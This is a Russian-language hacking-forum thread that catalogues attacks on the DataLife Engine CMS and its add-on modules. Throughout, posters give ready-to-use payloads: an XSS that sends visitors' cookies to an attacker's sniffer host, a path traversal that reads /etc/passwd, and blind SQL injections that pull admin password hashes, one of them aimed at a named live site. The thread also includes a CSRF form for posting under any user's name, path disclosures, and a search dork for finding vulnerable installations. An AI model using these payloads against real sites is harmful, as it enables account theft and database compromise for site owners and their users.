![]() |
[ Обзор уязвимостей DataLife Engine ]
Обзор уязвимостей [DataLife Engine] Сайт производителя: www.dle-news.ru Актуальная версия: 6.3 DataLife Engine v.3.7 [Раскрытие установочного пути] В parse.class.php выделено 12582912 байт на проверку сообщения. Переполнение делается так: "<<><><><><><>>" [ХСС] Угнать кукисы можно при помощи вставки картинки. [img][/img] -- этим можно воспользваться всегда, даже если нету таких кнопок при добавлении новости, личном сообщении, добавления коментария. Непосредственно сама ХСС: Код:
[IMG=left]http://anyimage.com/ok.gif" onmouseover='document.location=" class="fixed">http://your.sniffer.com/sniff/sniff.gif?id="+document.Код:
http://target.net/category/topic/ -- где topic -- это не существующая тема. Версия 4.1 возможно более ранние SQL Injection. Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример: [CODE]http://[host]/index.php?subaction=userinfo&user= DataLife Engine <= 4.1 Remote SQL Injection Exploit (perl) DataLife Engine <= 4.1 Remote SQL Injection Exploit (php) SQL injection for <=4.1 version exploit RGdatalife - exploit (php version) |
в виду наличия множества ресурсов в сети под этим движком решил поискать хоть какие-то уязвимости в нем..
пошел на офф сайт http://dle - news.ru/. SoftNews Media Group любезно предоставляет демо доступ для просмотра движка в роботе http://demo.dle - news.ru/ тут и начнем. Так, как это все на их сервере и это демо версия, то почти весь функционал они обрезали оставив только чтение =\. смотрим... баг в функциях оптимизации базы http://demo.dle-news.ru/admin.php?mod=dboption&action=dboption пакеты браузера Цитата:
и ошибка при не корректном посте данных /*пишет не корректное название таблицы*/ Цитата:
method=post auction=http://demo.dle-news.ru/admin.php?mod=dboption&action=dboption ta%5B%5D=dle_email,"><script>alert()</script>&whattodo=optimize или ta%5B%5D=dle_files"><script>alert(/xss/)</script>&whattodo=repair вообщем имеем пост ксс и расскрытие пути з.ы. сначала незаметил и создал новую тему ^^ |
DataLife engine...(версию уязвимую так и не выяснил... т.к. багу сам нашел, но точно знаю что до пятой... на 4.2 прокатывает)
Листилка (читалка) файлов там где не стоит мэйджик квотез: Код:
http://site.dmn/engine/ajax/vote.php?vote_action=results&vote_skin=../../../../../../../../../../../etc/passwd%00(c) Scipio |
Раскрытие полного установочного пути (для авторизированых юзеров)
Код:
index.php?do=pm&doaction=newpm&user[]=Код:
Warning: urldecode() expects parameter 1 to be string, array given in %путь_установки%/engine/init.php on line 49 |
blind sql-inj в неофициальном модуле к Dle files (файловый архив)
уязвимость после order by в параметре orderby Пример запроса: Код:
http://www.alldown.ru/index.php?do=files&op=cat&id=1&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+0,1),1,1))+between+0+and+0,url,(select%201%20from%20dle_downloads))+--+PHP код:
|
Нашёл XSS в модуле DLE Forum 2.1
Код:
http://site/dle-forum.php?status_report=<script>alert(/XSS/)</script>З.Ы. Гуглом ищутся по запросу: intitle:"Работает на DLE Forum" |
Ещё забавную багу нашёл в модуле DLE Forum 2.1
:) Возможность отправки сообщений от имени произвольного пользователя (можно несуществующего): Создайте страничку со следующим кодом: Код:
<form method="POST" action="http://site/?do=forum&act=post&code=reply&code=01"> |
Blind SQL Injection в в модуле DLE Forum 2.1:
На самом деле там две инъекции, в 2х запросах выполняющихся подряд, т.е. одна из ошибок бкдет отображаться в любом случае. Для выполнения, нужно залогиниться. Для начала нужно добавить иньекцию в БД Примеры: Код:
http://site/?do=forum&act=subscription&code=add&tid=-1 UNION SELECT 1,BENCHMARK(100000,md5(current_time)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 --Код:
http://site/index.php?do=forum&act=subscription&code=add&tid=-1 OR tid=(SELECT 1 UNION SELECT 2) --Код:
http://site/index.php?do=forum&act=subscriptionКод:
http://test2.ru/?do=forum&act=subscription&code=del&tid=[SQL]З.Ы. Сорри, что не добил скуль до конца, времени не хватает, но это возможно. |
SQL Injection в в модуле DLE mChat v. 2.0:
Нашёл в админке, и после ORDER BY, наверное бесполезная, но: Код:
http://site/admin.php?mod=mchat&start_from=SQLКод:
http://site/admin.php?mod=mchat&mchat_per_page=1SQL |
Раскрытие пути в модуле DLE mChat v. 2.0:
Код:
http://site/admin.php?mod=mchat&action=mess_delКод:
http://site/admin.php?mod=mchat&action=do_mess_del |
| Время: 22:29 |